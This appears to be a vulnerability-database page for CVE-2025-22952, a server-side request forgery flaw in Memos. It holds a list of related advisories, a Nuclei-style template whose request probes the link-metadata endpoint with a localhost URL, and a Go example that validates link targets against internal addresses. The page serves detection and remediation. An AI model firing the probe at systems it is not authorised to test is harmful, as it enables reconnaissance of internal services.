Family: 27 related entries

| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2025-22952 | 27 Feb 2025 21:59 | – | circl |
| Memos security vulnerability | 27 Feb 2025 00:00 | – | cnnvd |
| CVE-2025-22952 | 27 Feb 2025 00:00 | – | cve |
| CVE-2025-22952 | 27 Feb 2025 00:00 | – | cvelist |
| Memos Server-Side Request Forgery (SSRF) | 27 Feb 2025 21:32 | – | github |
| CVE-2025-22952 | 27 Feb 2025 20:16 | – | nvd |
| GHSA-WFXG-V3J4-7QMJ Memos Server-Side Request Forgery (SSRF) | 27 Feb 2025 21:32 | – | osv |
| GO-2025-3492 Memos Server-Side Request Forgery (SSRF) in github.com/usememos/memos | 3 Mar 2025 19:22 | – | osv |
| OPENSUSE-SU-2025:14889-1 govulncheck-vulndb-0.0.20250312T181707-1.1 on GA media | 13 Mar 2025 00:00 | – | osv |
| PT-2025-6100 | 10 Feb 2025 00:00 | – | ptsecurity |
```yaml
id: CVE-2025-22952

info:
  name: Elestio Memos <= v0.24.0 - Server-Side Request Forgery
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    elestio memos v0.23.0 is vulnerable to Server-Side Request Forgery (SSRF) due to insufficient validation of user-supplied URLs, which can be exploited to perform SSRF attacks.
  impact: |
    Unauthenticated attackers can exploit SSRF vulnerabilities to access internal services, bypass network security controls, and potentially retrieve sensitive information from internal systems.
  remediation: |
    Upgrade to Memos version 0.24.1 or later that properly validates and restricts URL access.
  reference:
    - https://github.com/advisories/GHSA-wfxg-v3j4-7qmj
    - https://elest.io/open-source/memos
    - https://github.com/usememos/memos
    - https://github.com/usememos/memos/issues/4413
    - https://github.com/usememos/memos/pull/4428
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-22952
    cwe-id: CWE-918
    epss-score: 0.02818
    epss-percentile: 0.8483
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-1924700661
  tags: cve,cve2025,elestio,memos,ssrf,oast,vuln,vkev

http:
  - raw:
      - |
        GET /api/v1/markdown/link:metadata?link=http://localhost:13042 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'localhost:13042'
          - 'connect: connection refused'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 500
# digest: 4a0a0047304502210091104d57b41ee7926c1f48502c49dfda1795d17c19b917c6679a5b14c940268802202878d1a3c6feb5a0d3f274b1e7ed46c8ab3d2441ff1f3573a6046e6f1bb4014a:922c64590222798bb761d5b6d8e72950
```
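The remediation field above says the fix "properly validates and restricts URL access" for the link-metadata fetcher. The following is an added example, written for this page and not code from the Memos project or the template authors, of what such a restriction looks like in Go (Memos is written in Go): the caller-supplied link must be an absolute http(s) URL, literal addresses and `localhost` names are rejected without a DNS lookup, and a hostname is accepted only if every address it resolves to is public. The resolver is injected so the check runs offline here; `constructedResolver` and its answers (`example.com`, `rebind.example`, the IPs) are made up for the demonstration, and in production you would wrap `net.DefaultResolver.LookupIPAddr` instead. The first probe in `main` is the `http://localhost:13042` link the template sends, which the hardened check refuses before any connection is attempted, so the "connection refused" message the matcher looks for never reaches the response body.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/url"
	"strings"
)

// Resolver maps a hostname to its addresses. It is injected so the check can
// be exercised offline with constructed answers (hypothetical helper).
type Resolver func(host string) ([]net.IP, error)

var errBlocked = errors.New("link target is not allowed")

// isInternalIP reports whether ip lies in a range a public link fetcher should
// never contact: loopback, unspecified, link-local, multicast, and RFC 1918 /
// IPv6 ULA private space.
func isInternalIP(ip net.IP) bool {
	return ip.IsLoopback() || ip.IsUnspecified() ||
		ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() ||
		ip.IsMulticast() || ip.IsPrivate()
}

// ValidateLinkTarget accepts only absolute http(s) URLs whose host resolves
// exclusively to public addresses. Every resolved address is checked, so a
// name that mixes public and private answers is rejected as well.
func ValidateLinkTarget(raw string, resolve Resolver) error {
	u, err := url.Parse(raw)
	if err != nil {
		return fmt.Errorf("parse: %w", err)
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return fmt.Errorf("%w: scheme %q", errBlocked, u.Scheme)
	}
	host := u.Hostname()
	if host == "" {
		return fmt.Errorf("%w: empty host", errBlocked)
	}
	// Literal IPs (IPv4 or bracketed IPv6) are classified directly, no DNS.
	if ip := net.ParseIP(strings.Trim(host, "[]")); ip != nil {
		if isInternalIP(ip) {
			return fmt.Errorf("%w: %s", errBlocked, ip)
		}
		return nil
	}
	lower := strings.ToLower(host)
	if lower == "localhost" || strings.HasSuffix(lower, ".localhost") {
		return fmt.Errorf("%w: %s", errBlocked, host)
	}
	ips, err := resolve(host)
	if err != nil {
		return fmt.Errorf("resolve %s: %w", host, err)
	}
	if len(ips) == 0 {
		return fmt.Errorf("%w: %s has no addresses", errBlocked, host)
	}
	for _, ip := range ips {
		if isInternalIP(ip) {
			return fmt.Errorf("%w: %s resolves to %s", errBlocked, host, ip)
		}
	}
	return nil
}

// constructedResolver stands in for DNS with made-up answers; rebind.example
// models a name whose answers mix a public and a private address.
func constructedResolver(host string) ([]net.IP, error) {
	table := map[string][]net.IP{
		"example.com":    {net.ParseIP("93.184.216.34")},
		"rebind.example": {net.ParseIP("93.184.216.34"), net.ParseIP("10.0.0.5")},
	}
	ips, ok := table[strings.ToLower(host)]
	if !ok {
		return nil, fmt.Errorf("no such host: %s", host)
	}
	return ips, nil
}

func main() {
	for _, link := range []string{
		"http://localhost:13042", // the link the template above submits
		"http://127.0.0.1/",
		"http://[::1]:8080/",
		"ftp://example.com/",
		"http://rebind.example/",
		"https://example.com/page",
	} {
		fmt.Printf("%-28s -> %v\n", link, ValidateLinkTarget(link, constructedResolver))
	}
}
```

A check like this belongs immediately before the outbound request is built, and the address list returned by the resolver should be the one actually dialed (for example via a custom `net.Dialer` control function) so that a second lookup at connect time cannot return a different answer than the one that was validated.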